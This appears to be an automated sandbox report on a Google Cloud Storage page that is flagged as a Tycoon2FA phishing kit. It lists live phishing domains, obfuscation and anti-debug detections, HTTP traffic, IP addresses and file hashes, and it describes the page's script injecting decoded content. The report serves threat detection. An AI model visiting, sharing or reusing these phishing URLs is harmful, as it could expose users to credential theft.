Edit tour

Windows Analysis Report
https://storage.googleapis.com/pastagiaperio/index.html

Overview

General Information

Sample URL:	https://storage.googleapis.com/pastagiaperio/index.html
Analysis ID:	1665687
Infos:

Detection

Invisible JS, Tycoon2FA

Score:	84
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Yara detected AntiDebug via timestamp check

Yara detected Invisible JS

Yara detected Obfuscation Via HangulCharacter

Yara detected Tycoon 2FA PaaS

AI detected suspicious Javascript

Classification

Process Tree

System is w10x64

chrome.exe (PID: 1832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 5724 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2524,i,14905595182361241848,15735740418327197154,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2556 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://storage.googleapis.com/pastagiaperio/index.html" MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
0.5.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
0.4.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
0.4.d.script.csv	JoeSecurity_AntiDebugBrowser	Yara detected AntiDebug via timestamp check	Joe Security
0.7.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
0.3.d.script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.6.d.script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.3.d.script.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
0.1.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.1.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
Click to see the 4 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://8rv.ngenerstr.ru/qJM63Jo/

Avira URL Cloud: Label: phishing

Phishing

Yara detected Invisible JS

Source: Yara match	File source: 0.3.d.script.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML

Yara detected Obfuscation Via HangulCharacter

Source: Yara match	File source: 0.3.d.script.csv, type: HTML
Source: Yara match	File source: 0.6.d.script.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML

Yara detected Tycoon 2FA PaaS

Source: Yara match	File source: 0.5.d.script.csv, type: HTML
Source: Yara match	File source: 0.4.d.script.csv, type: HTML
Source: Yara match	File source: 0.7.d.script.csv, type: HTML

AI detected suspicious Javascript

Source: 0.2..script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: https://8rv.ngenerstr.ru/qJM63Jo/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` to decode base64-encoded strings and the subsequent `document.write()` call to inject the decoded content into the page pose a significant security risk, as this could allow the execution of arbitrary code. Additionally, the script appears to be interacting with untrusted domains, further increasing the risk. Overall, this script exhibits a high level of malicious intent and should be considered a serious security threat.

Source: https://storage.googleapis.com/pastagiaperio/index.html	HTTP Parser: No favicon
Source: https://storage.googleapis.com/pastagiaperio/index.html	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 173.194.219.105:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.71.52:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.165.184.23:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.165.184.23:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.165.184.23:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.105:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.103:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.37:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.37:443 -> 192.168.2.4:49747 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /qJM63Jo/ HTTP/1.1Host: 8rv.ngenerstr.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://storage.googleapis.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /statics/cropped/js/fonts/Silka-Roman-Webfont/silka-semibold-webfont.woff2 HTTP/1.1Host: d1c8jfpu8q0q2k.cloudfront.netConnection: keep-aliveOrigin: https://8rv.ngenerstr.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://8rv.ngenerstr.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /statics/cropped/js/img/robot-illy.png HTTP/1.1Host: d1c8jfpu8q0q2k.cloudfront.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://8rv.ngenerstr.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /statics/cropped/js/img/robot-illy.png HTTP/1.1Host: d1c8jfpu8q0q2k.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/icons/product/cloud_storage-32.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJWhywEInP7MAQiFoM0BCL7VzgEIgdbOAQjB2M4BCMjczgEIiuDOAQiu5M4BCIvlzgE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://storage.googleapis.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/icons/product/cloud_storage-32.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJWhywEInP7MAQiFoM0BSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /chiriya$exfe HTTP/1.1Host: iglq7.mlniojjrwm.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Origin: https://storage.googleapis.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://storage.googleapis.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /chiriya$exfe HTTP/1.1Host: iglq7.mlniojjrwm.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /chiriya$exfe HTTP/1.1Host: iglq7.mlniojjrwm.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Origin: https://storage.googleapis.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://storage.googleapis.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /chiriya$exfe HTTP/1.1Host: iglq7.mlniojjrwm.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: 8rv.ngenerstr.ru
Source: global traffic	DNS traffic detected: DNS query: d1c8jfpu8q0q2k.cloudfront.net
Source: global traffic	DNS traffic detected: DNS query: iglq7.mlniojjrwm.ru
Source: global traffic	DNS traffic detected: DNS query: beacons.gcp.gvt2.com

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 173.194.219.105:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.71.52:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.165.184.23:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.165.184.23:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.165.184.23:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.105:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.103:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.37:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.37:443 -> 192.168.2.4:49747 version: TLS 1.2

Source: classification engine

Classification label: mal84.phis.evad.win@22/15@24/7

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2524,i,14905595182361241848,15735740418327197154,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2556 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://storage.googleapis.com/pastagiaperio/index.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2524,i,14905595182361241848,15735740418327197154,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2556 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Malware Analysis System Evasion

Yara detected AntiDebug via timestamp check

Source: Yara match

File source: 0.4.d.script.csv, type: HTML

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://storage.googleapis.com/pastagiaperio/index.html	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
https://8rv.ngenerstr.ru/qJM63Jo/	100%	Avira URL Cloud	phishing
https://d1c8jfpu8q0q2k.cloudfront.net/statics/cropped/js/img/robot-illy.png	0%	Avira URL Cloud	safe
https://iglq7.mlniojjrwm.ru/chiriya$exfe	0%	Avira URL Cloud	safe
https://d1c8jfpu8q0q2k.cloudfront.net/statics/cropped/js/fonts/Silka-Roman-Webfont/silka-semibold-webfont.woff2	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
d1c8jfpu8q0q2k.cloudfront.net	3.165.184.23	true	false	high
beacons-handoff.gcp.gvt2.com	142.251.116.94	true	false	high
iglq7.mlniojjrwm.ru	104.21.25.37	true	false	unknown
gce-beacons.gcp.gvt2.com	35.241.39.74	true	false	high
www.google.com	173.194.219.105	true	false	high
8rv.ngenerstr.ru	104.21.71.52	true	true	unknown
beacons.gcp.gvt2.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://iglq7.mlniojjrwm.ru/chiriya$exfe	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/icons/product/cloud_storage-32.png	false		high
http://c.pki.goog/r/r4.crl	false		high
https://d1c8jfpu8q0q2k.cloudfront.net/statics/cropped/js/img/robot-illy.png	false	Avira URL Cloud: safe	unknown
https://8rv.ngenerstr.ru/qJM63Jo/	true	Avira URL Cloud: phishing	unknown
https://d1c8jfpu8q0q2k.cloudfront.net/statics/cropped/js/fonts/Silka-Roman-Webfont/silka-semibold-webfont.woff2	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.25.37	iglq7.mlniojjrwm.ru	United States	13335	CLOUDFLARENETUS	false
173.194.219.105	www.google.com	United States	15169	GOOGLEUS	false
104.21.71.52	8rv.ngenerstr.ru	United States	13335	CLOUDFLARENETUS	true
3.165.184.23	d1c8jfpu8q0q2k.cloudfront.net	United States	16509	AMAZON-02US	false
108.177.122.105	unknown	United States	15169	GOOGLEUS	false
108.177.122.103	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1665687
Start date and time:	2025-04-15 18:48:35 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://storage.googleapis.com/pastagiaperio/index.html
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.phis.evad.win@22/15@24/7
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, sppsvc.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.251.15.94, 142.250.9.101, 142.250.9.139, 142.250.9.138, 142.250.9.113, 142.250.9.100, 142.250.9.102, 142.251.15.139, 142.251.15.102, 142.251.15.138, 142.251.15.113, 142.251.15.101, 142.251.15.100, 64.233.176.84, 74.125.136.113, 74.125.136.139, 74.125.136.138, 74.125.136.100, 74.125.136.101, 74.125.136.102, 74.125.21.101, 74.125.21.139, 74.125.21.113, 74.125.21.102, 74.125.21.100, 74.125.21.138, 74.125.136.207, 142.251.15.207, 64.233.177.207, 173.194.219.207, 74.125.21.207, 142.250.9.207, 108.177.122.207, 172.217.215.207, 64.233.185.207, 64.233.176.207, 74.125.138.207, 172.253.124.207, 199.232.214.172, 23.4.43.62, 199.232.210.172, 108.177.122.113, 108.177.122.138, 108.177.122.101, 108.177.122.139, 108.177.122.100, 108.177.122.102, 173.194.219.100, 173.194.219.102, 173.194.219.113, 173.194.219.138, 173.194.219.101, 173.194.219.139, 173.194.219.94, 74.125.138.100, 74.125.138.101, 74.125.138.113, 74.125.138.138, 74.125.138.139, 74.125.138.102, 23.76.34.6, 20.12.23.50
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://storage.googleapis.com/pastagiaperio/index.html

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 28072, version 1.0
Category:	downloaded
Size (bytes):	28072
Entropy (8bit):	7.992547594729783
Encrypted:	true
SSDEEP:	768:YSpz/RIidv8hF3Uthre6eUB8TIGEbxFi6lNTmldNX:Ya/XdRxe6e3Iv3NTuX
MD5:	56F7292614C26375C4CB455DDA8A7A8F
SHA1:	1086059CA9F9639877F3E871C70EE8FA4DB06DD5
SHA-256:	D6F2C3743A7FBB82FCD518A547E80E2935F2B1D983CAE98DD2B627D59DE1C558
SHA-512:	3EB79B23D9465093C85249D2F977016DB1F9796CB8810E426BBCF5E87DD5481DD9D10662530D513E67F753A7071894DFBEF78DCF2A060060CFE5B9DAA4D547B2
Malicious:	false
Reputation:	low
URL:	https://d1c8jfpu8q0q2k.cloudfront.net/statics/cropped/js/fonts/Silka-Roman-Webfont/silka-semibold-webfont.woff2
